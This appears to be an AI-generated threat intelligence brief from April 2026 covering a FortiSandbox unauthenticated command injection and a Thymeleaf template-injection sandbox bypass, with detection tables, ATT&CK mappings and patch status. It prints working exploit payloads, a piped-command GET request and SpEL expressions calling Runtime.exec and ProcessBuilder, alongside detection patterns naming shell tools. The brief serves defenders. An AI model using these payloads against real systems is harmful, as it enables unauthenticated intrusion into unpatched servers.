Cyber Threat Brief — April 18 2026
⚠️ This report is AI-generated. Always validate findings.
1. FortiSandbox Unauthenticated Root RCE — CVE-2026-39808
TL;DR: Unauthenticated OS command injection in FortiSandbox’s /fortisandbox/job-detail/tracer-behavior endpoint gives root RCE with a single curl command. Public PoC on GitHub; CVSS 9.8.
What’s New:
- Exploit path:
GET /fortisandbox/job-detail/tracer-behavior?jid=|(cmd > /web/ng/out.txt)|— thejidparameter is passed unsanitized to a shell command, yielding unauthenticated root-level code execution. - Affected: FortiSandbox 4.4.0 through 4.4.8. Fixed in 4.4.9+. Advisory: FG-IR-26-100.
- PoC published by researcher samu-delucas on GitHub (April 16); Fortinet patch released same week.
- Companion vuln CVE-2026-39813 (auth bypass) also patched — chaining the two gives full pre-auth compromise of FortiSandbox appliances.
- Shodan/Censys show ~2,400 internet-facing FortiSandbox instances; mass scanning expected imminently.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
GET /fortisandbox/job-detail/tracer-behavior with pipe chars in jid param | HTTP request | T1190 | WAF, reverse proxy, FortiSandbox access logs | Block/Alert |
| Outbound connections from FortiSandbox to unexpected hosts | Network | T1071.001 | Firewall, NDR, Zeek conn.log | Alert — post-exploitation C2 |
New files in /web/ng/ written by web process | File write | T1059.004 | FortiSandbox local audit log, HIDS | Alert — webshell/output staging |
Unexpected child processes of FortiSandbox web service (/bin/sh, bash, curl, wget) | Process chain | T1059.004 | EDR (if agent deployed), FortiSandbox syslog | High-fidelity alert |
| FortiSandbox version < 4.4.9 exposed to internet | Recon | T1190 | ASM scan, Shodan/Censys | Remediate — upgrade or restrict access |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No FortiSandbox-specific rule; write SPL for HTTP requests to tracer-behavior with shell metacharacters in jid |
| Elastic | None | No rule; custom KQL for FortiSandbox access logs with pipe/semicolon injection patterns |
| Sigma | None | Write web_fortisandbox_cmd_injection_cve_2026_39808.yml matching GET to /job-detail/tracer-behavior with shell metacharacters |
Sources: CybersecurityNews PoC Report · Help Net Security · The Register · Fortinet Advisory FG-IR-26-100
2. Thymeleaf SSTI Sandbox Bypass — CVE-2026-40478
TL;DR: Whitespace parsing gap + incomplete type blocklist in Thymeleaf ≤ 3.1.3 lets attackers bypass expression sandbox for full RCE on any Spring/Java app using Thymeleaf templates with user-controlled input. CVSS 9.1; PoC public.
What’s New:
- Root cause: a single tab character between
Newand a class name bypasses case-sensitive keyword blocks; type blocklist only coveredjava.*packages, missing Spring framework classes entirely. - Exploit payloads:
__${T(java.lang.Runtime).getRuntime().exec('cmd')}__(basic) and bypass variant__|$${New\tjava.util.Scanner(New\tProcessBuilder('cmd','/c','whoami').start().getInputStream()).next()}|__::.xusing$${instead of${. - Affects all Thymeleaf ≤ 3.1.3.RELEASE (thymeleaf, thymeleaf-spring5, thymeleaf-spring6). Fixed in 3.1.4.RELEASE.
- No authentication required if user input reaches template engine — common in Spring MVC apps with
@RequestParaminjected into view names or template fragments. - Endor Labs published detailed root-cause analysis; multiple PoCs circulating on GitHub.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
HTTP params containing __${, $${, T(java.lang.Runtime), ProcessBuilder | HTTP request | T1190 | WAF, reverse proxy, web access logs | Block/Alert |
| HTTP params with `__ | or | __` delimiters combined with SpEL expressions | HTTP request | T1190 |
Java process spawning unexpected child processes (cmd.exe, /bin/sh, bash) after web request | Process chain | T1059 | Sysmon EID 1, EDR, auditd | High-fidelity alert |
thymeleaf dependency version ≤ 3.1.3 in pom.xml / build.gradle | Software inventory | T1190 | SCA tools, SBOM | Remediate — upgrade to 3.1.4+ |
| Outbound connections from Java web app to unexpected hosts post-exploitation | Network | T1071.001 | Firewall, NDR | Alert — post-exploitation indicator |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No Thymeleaf SSTI rule; write SPL for WAF/proxy logs matching __\$\{ or T(java in request parameters |
| Elastic | None | No rule; custom KQL for web logs with SpEL expression patterns (T(java, ProcessBuilder, Runtime.exec) |
| Sigma | web_java_ssti_generic.yml (partial) | Generic SSTI rule may catch basic payloads; misses $${ and tab-based bypasses — extend with CVE-2026-40478 bypass patterns |
Sources: Endor Labs Analysis · CSO Online · GitLab Advisory · GitHub Advisory GHSA-xjw8-8c5c-9r79
Status Updates
- CVE-2026-33825 / RedSun / UnDefend (Microsoft Defender): No new developments since yesterday; RedSun and UnDefend remain unpatched. Continue monitoring for Microsoft out-of-band fix. Original brief.
- CVE-2026-34197 (Apache ActiveMQ Jolokia RCE): CISA KEV deadline May 6; no new ITW activity reported. Verify patching to 5.19.4 / 6.2.3. Original brief.
- CVE-2026-32201 (SharePoint Spoofing): Patch Tuesday fix available; verify deployment across SharePoint farms. Original brief.